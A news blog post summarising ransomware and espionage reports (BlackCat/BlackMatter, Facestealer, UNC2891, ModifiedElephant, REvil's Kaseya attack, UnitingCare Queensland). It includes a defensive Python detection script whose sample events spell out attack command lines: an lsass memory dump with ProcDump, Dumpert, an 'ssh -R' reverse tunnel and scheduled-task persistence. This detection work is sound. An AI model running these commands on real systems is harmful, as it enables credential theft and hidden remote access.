
CYBERSECURITY: BlackCat You DON’T Want Crossing Your Path As It Brings Malware

This is our daily post that is shared across Twitter & Telegram and published first here with Kindness & Love ❤️❤️ on My.Daz.blog

#AceNewsRoom With ‘Kindness & Wisdom’ Mar.22, 2022 @acebreakingnews

Ace News Room Cutting Floor 22/03/2022


#AceSecurityDesk says, according to The Register: Cybersecurity researchers with Cisco have outlined probable links between the BlackMatter/DarkSide ransomware ring responsible for last year’s high-profile attack on Colonial Pipeline and an emerging ransomware-as-a-service product dubbed BlackCat. Also in the report: an Android trojan with 100,000+ app installs, and Solaris malware. (The Register, Tue 22 Mar 2022, 05:29 UTC)

In a write-up this month, Cisco’s Talos threat intelligence unit said a domain name and IP addresses used in a BlackCat infection in December had also been used in a BlackMatter ransomware deployment three months earlier.

In addition, the team outlined tools, file names, and techniques that are common to both the BlackMatter and BlackCat ransomware variants. As a ransomware-as-a-service (RaaS) operation, BlackCat can be rented by criminal affiliates to infect and extort targets, with the malware’s developers typically getting a cut of the ransom.

Given that the affiliates are individually responsible for compromising their victims’ systems and deploying the actual ransomware binaries, “it is likely that attacks carried out by the same ransomware family may differ in techniques and procedures,” Talos’s Tiago Pereira and Caitlin Huey noted. In other words, affiliates infect victims in different ways with the same ransomware.

At the same time, RaaS operators often make training materials, general techniques, and tools available to affiliates – as shown by the documents leaked from the Conti ransomware gang – so you’d expect to see some similarities in the attacks carried out by these miscreants.

Still, each ransomware strain should have its own command-and-control (C2) systems, and yet overlapping C2 resources were seen in BlackMatter and BlackCat infections, fueling rumors of strong ties between the two. The Talos team further speculated that “a BlackMatter affiliate was likely an early adopter – possibly in the first month of operation – of BlackCat.”

This is interesting because it sheds some light on the interconnected networks of criminals menacing organizations. It’s also useful to know what to look out for when defending against or gaining early detection of this kind of ransomware.

Those rumors of a close connection began as soon as BlackCat caught the attention of cybersecurity vendors and researchers. The MalwareHunter Team tweeted about the ransomware group in December, and other threat intelligence groups, such as S2W out of South Korea, reported similarities between some of the configuration fields used by both BlackCat and BlackMatter.

However, there also were differences. For instance, BlackCat was written in Rust, while ransomware from both DarkSide and BlackMatter – the latter a rebranded DarkSide group – were written in C/C++, S2W wrote in an analysis.

Speaking of malware… Pradeo says it has spotted an Android app, installed more than 100,000 times from the Google Play Store, that carries a trojan called Facestealer. The trojan socially engineers victims into handing over their Facebook login details, which are sent to a Russian server. The app in question was Craftsart Cartoon Photo Tools, which has since been removed by Google. If for some reason you have it installed, get rid of it.

Mandiant has documented the activities of a team it calls UNC2891 and its targeting of Solaris systems with backdoors dubbed TINYSHELL and SLAPSTICK and a rootkit called CAKETAP. It is believed CAKETAP was used to alter messages on ATM networks to pull off fraudulent withdrawals from banks using bogus payment cards. UNC2891, we’re told, is skilled on Unix and Linux-flavored machines, is financially motivated, and has gone undetected in large systems for years.

A BlackCat representative in a February interview with Recorded Future said the two groups had a “connection” but that BlackCat was not a rebranding of BlackMatter.

The representative also said BlackCat is an affiliate of other RaaS groups, and that they took knowledge from other outfits. If true, BlackCat is an example of vertical business expansion – controlling the upstream supply chain by making a service better suited for their needs and adding another potential avenue for revenue, the Talos researchers wrote.

Vertical expansion also is a business strategy when there is distrust in the supply chain.

“There are several cases of vulnerabilities in ransomware encryption and even of backdoors that can explain a lack of trust in RaaS,” they wrote. “One particular case mentioned by the BlackCat representative was a flaw in DarkSide/Blackmatter ransomware allowing victims to decrypt their files without paying the ransom. Victims used this vulnerability for several months, resulting in big losses for affiliates.”

Double blow

BlackCat – also known as ALPHV – is being used in double-extortion attacks, where files are not only encrypted but victims are also threatened with public disclosure of the stolen files if the ransom isn’t paid. BlackCat first appeared in November 2021 and has infected several companies in different parts of the world; more than 30 percent of the compromises have hit US-based companies, according to Talos.

When comparing the BlackMatter intrusion in September and the BlackCat one in December, the Talos team believed the pair of cyber-attacks were run by the same affiliate. Both raids went the usual way: an initial compromise followed by exploration and data exfiltration, preparation, and then execution of the extortionware.

There were further similarities. In both the BlackMatter and BlackCat infections the persistence methods (a reverse SSH tunnel and scheduled tasks), the lateral movement techniques and the C2 domain were the same. In addition, local and domain user credentials were collected on some key systems by dumping the memory of the LSASS process with Microsoft Sysinternals ProcDump and Outflank’s Dumpert, and extracting the credentials from those dumps.

“In both attacks, before the actual execution of the ransomware, the attackers performed several actions preparing systems to make the execution as successful as possible,” the researchers wrote. “On the day of the attack, the attacker logged in to the domain controller and opened the group policy management interface. The attackers then dropped and executed a file named ‘apply.ps1.’ We believe this script created and prepared the group policy to cause the execution of the ransomware throughout the domain.”
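The behaviours Talos describes in the two passages above (LSASS dumping with ProcDump or Dumpert, a reverse SSH tunnel and scheduled tasks for persistence, and a PowerShell script dropped on the domain controller to stage a group policy) map directly onto process-creation telemetry. The following Python is an added example written for this page, not code from The Register or from Cisco Talos. It runs a handful of detection rules over constructed, Sysmon-style process-creation records; the hostnames, paths, user names, IP address and the `role` field (assumed to come from an asset-inventory join, since it is not a native Sysmon field) are all made up for illustration. The domain-controller rule deliberately keys on "a script run from a temp or user-writable path on a DC" rather than on the literal file name `apply.ps1`, which is the one instance the report names.

```python
"""Detection rules for the BlackMatter/BlackCat post-compromise behaviours
described above, run over constructed Sysmon Event ID 1 style records.
None of the events below are real telemetry."""
import re
import shlex

# Constructed sample events (not real telemetry). "role" is assumed to be
# joined in from an asset inventory; hosts, users and paths are invented.
SAMPLE_EVENTS = [
    {"host": "ws01", "role": "workstation", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" notes.txt'},
    {"host": "fs02", "role": "file server", "user": "CORP\\svc_backup",
     "image": r"C:\temp\procdump64.exe",
     "cmdline": r"procdump64.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp"},
    {"host": "fs02", "role": "file server", "user": "CORP\\svc_backup",
     "image": r"C:\temp\Outflank-Dumpert.exe",
     "cmdline": r"Outflank-Dumpert.exe"},
    {"host": "ws07", "role": "workstation", "user": "CORP\\admin2",
     "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": r"ssh.exe -N -R 4444:127.0.0.1:3389 user@198.51.100.7 -i C:\temp\id_rsa"},
    {"host": "ws07", "role": "workstation", "user": "CORP\\admin2",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "Updater" /tr C:\temp\tunnel.bat /sc minute /mo 5 /ru SYSTEM'},
    {"host": "dc01", "role": "domain controller", "user": "CORP\\admin2",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\temp\apply.ps1"},
    {"host": "dc01", "role": "domain controller", "user": "CORP\\sysadmin",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup-gpo.ps1"},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def argv(cmdline):
    """Tokenise a Windows command line without treating backslashes as escapes."""
    try:
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:
        tokens = cmdline.split()
    return [t.strip('"') for t in tokens]


def rule_lsass_dump(ev):
    """ProcDump-style full memory dump (-ma) of lsass, or the Dumpert tool.
    The -ma/lsass check ignores the image name so a renamed ProcDump still hits."""
    if "dumpert" in basename(ev["image"]):
        return True
    args = [a.lower() for a in argv(ev["cmdline"])]
    return "-ma" in args and any("lsass" in a for a in args)


def rule_reverse_ssh(ev):
    """ssh/plink started with -R: a remote port forward back to the attacker."""
    return basename(ev["image"]) in {"ssh.exe", "ssh", "plink.exe"} and "-R" in argv(ev["cmdline"])


def rule_schtask(ev):
    """schtasks /create: scheduled-task persistence."""
    args = [a.lower() for a in argv(ev["cmdline"])]
    return basename(ev["image"]) == "schtasks.exe" and "/create" in args


STAGING_PATH = re.compile(r"\\(temp|tmp|programdata|public|downloads)\\[^\\\s\"']+\.ps1\b", re.I)


def rule_gpo_staging(ev):
    """PowerShell script run from a temp/user-writable path on a domain controller
    (generalises the apply.ps1 drop Talos observed before the GPO push)."""
    if ev["role"] != "domain controller":
        return False
    if basename(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False
    return STAGING_PATH.search(ev["cmdline"]) is not None


RULES = {
    "lsass_memory_dump": rule_lsass_dump,
    "reverse_ssh_tunnel": rule_reverse_ssh,
    "scheduled_task_created": rule_schtask,
    "script_staged_on_dc": rule_gpo_staging,
}


def scan(events):
    """Return (rule, host, user, cmdline) for every event that trips a rule."""
    return [(name, ev["host"], ev["user"], ev["cmdline"])
            for ev in events for name, rule in RULES.items() if rule(ev)]


def hosts_by_rule(events):
    """Collapse hits to {rule: sorted hosts} to show how far the chain has spread."""
    out = {}
    for name, host, _, _ in scan(events):
        out.setdefault(name, set()).add(host)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(" | ".join(hit))
```

Run against the constructed events, the scan flags the ProcDump and Dumpert executions on the file server, the `ssh -R` tunnel and the `schtasks /create` on the workstation, and the script run from `C:\temp` on the domain controller, while the legitimate notepad and `C:\Scripts` PowerShell invocations pass. The value of `hosts_by_rule` is the overview an analyst wants: the same host showing both the tunnel and the scheduled task, and the DC appearing only at the staging step, is the "preparation before execution" sequence the Talos write-up describes.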

The researchers admitted they still don’t know how tightly related BlackCat is to BlackMatter, but that given the overlapping tools, techniques, and infrastructure of the two infections, they have “moderate confidence” that BlackMatter affiliates were probably among the early adopters of BlackCat.

“As we have seen several times before, RaaS services come and go,” they wrote. “Their affiliates, however, are likely to simply move on to a new service. And with them, many of their TTPs [tactics, techniques and procedures] are likely to persist.”

#AceNewsDesk report ………..Published: Mar.22:  2022: 

Editor says …Sterling Publishing & Media Service Agency is not responsible for the content of external site or from any reports, posts or links, and can also be found here on Telegram: https://t.me/acenewsdaily all of our posts from Twitter can be found here: https://acetwitternews.wordpress.com/ and all wordpress and live posts and links here: https://acenewsroom.wordpress.com/ and thanks for following as always appreciate every like, reblog or retweet and free help and guidance tips on your PC software or need help & guidance from our experts AcePCHelp.WordPress.Com


BREAKING: Unknown Hackers Target Indian Human Rights Activists & Lawyers

#AceNewsReport – Feb.11: A previously unknown hacking group has been linked to targeted attacks against human rights activists, human rights defenders, academics, and lawyers across India in an attempt to plant “incriminating digital evidence.”

#AceSecurityDesk says: Hackers Planted Fake Digital Evidence on Devices. Cybersecurity firm SentinelOne attributed the intrusions to a group it tracks as “ModifiedElephant,” an elusive threat actor that’s been operational since at least 2012, whose activity aligns sharply with Indian state interests.

Source: The Hacker News

“ModifiedElephant operates through the use of commercially available remote access trojans (RATs) and has potential ties to the commercial surveillance industry,” the researchers said. “The threat actor uses spear-phishing with malicious documents to deliver malware, such as NetWire, DarkComet, and simple keyloggers.”

The primary goal of ModifiedElephant is to facilitate long-term surveillance of targeted individuals, ultimately leading to the delivery of “evidence” on the victims’ compromised systems with the goal of framing and incarcerating vulnerable opponents.

Notable targets include individuals associated with the 2018 Bhima Koregaon violence in the Indian state of Maharashtra, SentinelOne researchers Tom Hegel and Juan Andres Guerrero-Saade said in a report.

The attack chains involve infecting the targets — some of them multiple times in a single day — using spear-phishing emails themed around topics related to activism, climate change, and politics, and containing malicious Microsoft Office document attachments or links to files hosted externally that are weaponized with malware capable of taking control of victim machines.

“The phishing emails take many approaches to gain the appearance of legitimacy,” the researchers said. “This includes fake body content with a forwarding history containing long lists of recipients, original email recipient lists with many seemingly fake accounts, or simply resending their malware multiple times using new emails or lure documents.”

Also distributed using phishing emails is an unidentified commodity trojan targeting Android that enables the attackers to intercept and manage SMS and call data, wipe or unlock the device, perform network requests, and remotely administer the infected devices. SentinelOne characterized it as an “ideal low-cost mobile surveillance toolkit.”

“This actor has operated for years, evading research attention and detection due to their limited scope of operations, the mundane nature of their tools, and their regionally-specific targeting,” the researchers said.

#AceNewsDesk report …………..Published: Feb.11: 2022:



FEATURED: #Cybersecurity Report: An affiliate of Russia’s notorious REvil gang, best known for extorting $US11 million ($15 million) from meat processor JBS earlier this year, infected thousands of victims in at least 17 countries on Friday #AceNewsDesk report

#AceSecurityReport – July.05: Cybersecurity experts are continuing to work to stem the impact of what may be the single biggest global ransomware attack of its kind on record.

#AceSecurityDesk says: on Friday we published a post on this ransomware attack; this follow-up carries the latest details, with thousands of victims across at least 17 countries now reported.

[Image caption] IT security experts say it’s no coincidence the attack was launched at the beginning of the US Fourth of July weekend. (ABC News: Nic MacBean)

An affiliate of Russia’s notorious REvil gang, best known for extorting $US11 million ($15 million) from meat processor JBS earlier this year, infected thousands of victims in at least 17 countries on Friday.

Miami-based IT firm Kaseya, which was the initial target of the attack, said fewer than 60 of its customers had been “directly affected”.

But the full impact of the intrusion is still coming into focus, in part because the Kaseya software tool commandeered by the cyber criminals is used by so-called managed service providers, which handle back-office IT work like installing updates for other businesses.

In some cases, chain reactions fed more widespread disruption.

The Swedish Coop grocery store chain had to close hundreds of stores on Saturday because its cash registers are run by Visma Esscom, which manages servers for a number of Swedish businesses and in turn uses Kaseya.

[Image caption] JBS Foods paid the equivalent of $US11 million to end a five-day cyber attack that halted its operations around the world last month. (ABC News: Jim Malo)

Brett Callow, a ransomware expert at the cybersecurity firm Emsisoft, said he was unaware of any previous ransomware supply-chain attack on this scale.

There have been others, but they were fairly minor, he said.

The FBI said it was investigating the attack, along with the federal Cybersecurity and Infrastructure Security Agency, but added that “the scale of this incident may make it so that we are unable to respond to each victim individually”.

Deputy national security advisor Anne Neuberger later issued a statement saying President Joe Biden had “directed the full resources of the government to investigate this incident”, and urged all who believed they were compromised to alert the FBI.

On Saturday Mr Biden had suggested the US would respond if the Kremlin was found to be involved.

The attack came less than a month after Mr Biden pressed Russian President Vladimir Putin to stop providing safe haven to REvil and other ransomware gangs whose attacks the US deems a national security threat.

[Image caption] Vladimir Putin and Joe Biden discussed Russia’s treatment of cybercriminals during their meeting last month. (AP: Peter Klaunzer/Swiss Federal Office of Foreign Affairs)

Mostly smaller business affected

The businesses and public agencies hit by the latest attack included financial services, travel and leisure and the public sector, but few large companies were involved, cybersecurity firm Sophos reported.

Ransomware criminals break into networks and sow malware that cripples networks on activation by scrambling all their data. Victims get a decoder key when they pay up.

Kaseya chief executive Fred Voccola estimated the number of total victims to be in the low thousands, mostly small businesses like “dental practices, architecture firms, plastic surgery centres, libraries, things like that”.

Mr Voccola said that only 50 to 60 of the company’s 37,000 customers were compromised.

But he said 70 per cent of those were managed service providers who used the company’s software to manage multiple customers.

The program automates the installation of software and security updates and manages backups and other vital tasks.

Cybersecurity firm ESET identified victims in at least 17 countries, including the United Kingdom, South Africa, Canada, Argentina, Mexico, Indonesia, New Zealand and Kenya.

Timing no coincidence

Cybersecurity researcher Jake Williams, president of Rendition Infosec, said he was already working with six companies hit by the ransomware.

It was no accident it happened before the Fourth of July weekend, when IT staffing was generally thin in the US, he added.

“There’s zero doubt in my mind that the timing here was intentional,” he said.

Many victims in the US may not learn of it until they are back at work on Monday.

The vast majority of end customers of managed service providers “have no idea” what kind of software is used to keep their networks humming, said Mr Voccola.

Kaseya said it sent a detection tool to nearly 900 customers on Saturday night.

John Hammond of Huntress Labs, one of the first cybersecurity firms to sound the alarm on the attack, said he had seen $US5 million and $US500,000 demands by REvil for the decryptor key needed to unlock scrambled networks. The smallest amount demanded appears to have been $US45,000.

This is not the first ransomware attack to target managed services providers.

In 2019, criminals hobbled the networks of 22 Texas municipalities through one. That same year, 400 US dental practices were crippled in a separate attack.

#AceNewsDesk report ………Published: July.05: 2021:

Information provided by: #AceSecurityDesk/AP/Reuters/various security firms/



(AUSTRALIA) JUST IN: UnitingCare Queensland has been the victim of a cyber attack, affecting its hospitals and aged care homes #AceSecurityDesk report


#AceSecurityReport – Apr.27: The healthcare provider said it was affected by a cyber incident on Sunday, and its digital and technology systems were currently inaccessible:

UnitingCare, which runs the Wesley and St Andrew’s Hospitals in Brisbane, hit by cyber attack. The organisation runs the Wesley and St Andrew’s Hospitals in Brisbane, St Stephen’s Hospital in Hervey Bay and the Buderim Private Hospital on the Sunshine Coast, and dozens of aged care and disability services throughout the state. (ABC Radio interview with the Head of the ACSC)

Source: ABC News

[Image caption] The Wesley Hospital is one of the services run by UnitingCare. (Wikimedia: Commander Keane)

UnitingCare has contacted the Australian Cyber Security Centre (ACSC), and technical and forensic advisors are working on the outage.

Manual back-ups are now in place, and some services are being rescheduled.

In a statement, UnitingCare Queensland said it did not know when the problem would be resolved, but it was committed to keeping its people, patients, clients and residents informed and safe.

A spokesperson for the organisation confirmed the charity’s email system was impacted, with some staff having to use private email accounts.

In August last year the ACSC issued a statement warning of specific ransomware known as Maze that was potentially being used to target aged care and health sectors.

The ACSC statement said the sectors were considered “lucrative targets” because of the sensitive personal and medical information collected by the sectors.

“The Maze ransomware is designed to lock or encrypt an organisation’s valuable information so that it can no longer be used, and has been observed being used alongside other tools which steal important business information,” the statement said.

“Cybercriminals may then threaten to post this information online unless a further ransom is paid. This is especially effective in the aged care and healthcare sectors.”

#AceSecurityDesk report ………Published: Apr.27: 2021:
